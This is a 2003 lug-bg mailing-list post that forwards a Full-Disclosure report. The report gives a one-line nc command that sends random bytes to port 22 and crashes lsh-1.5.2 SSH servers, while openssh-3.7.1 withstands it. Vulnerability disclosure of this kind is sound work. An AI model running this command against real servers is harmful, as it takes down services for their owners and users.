  • Subject: Re: lug-bg: [Fwd: [Full-Disclosure] Remote root in LSH]
  • From: Ivan Dimitrov <dobber@xxxxxxxxxx>
  • Date: Fri, 19 Sep 2003 16:49:16 +0300

oshte edin DoS prepraten ot sushtiq maillist. raboti i na 1.4. versii

From Full Disclosure
<cut>
Better question; thanks to a tip from a friend, I can provide
concrete evidence to the contrary.

This command:

    dd if=/dev/urandom bs=1024 count=1|nc <hostname> 22 >/dev/null

takes down an lsh-1.5.2 reliably taking no more than 2-3 tries on
average.

The same, both in the above form and with 10kb of urandom per blat,
doesn't bother openssh-3.7.1 for hundreds of tries.

I tried emailing this to lsh-bugs, got some moronic thing from some
idiot third-party anti-spam service "please send this special email
to this special place and we might think about letting your message
through". Right.

So much for lshd, at least for now. Back to the patch-n-grind of
openssh.
<cut>

--

Hi! I'm your friendly neighbourhood signature virus.
Copy me to your signature file and help me spread!

наши приятели

линукс за българи
http://linux-bg.org

FSA-BG
http://fsa-bg.org

OpenFest
http://openfest.org

FreeBSD BG
http://bg-freebsd.org

KDE-BG
http://kde.fsa-bg.org/

Gnome-BG
http://gnome.cult.bg/

проект OpenFMI
http://openfmi.net

NetField Forum
http://netField.ludost.net/forum/

Linux-Bulgaria.ORG

Mailing list messages are © Copyright their authors.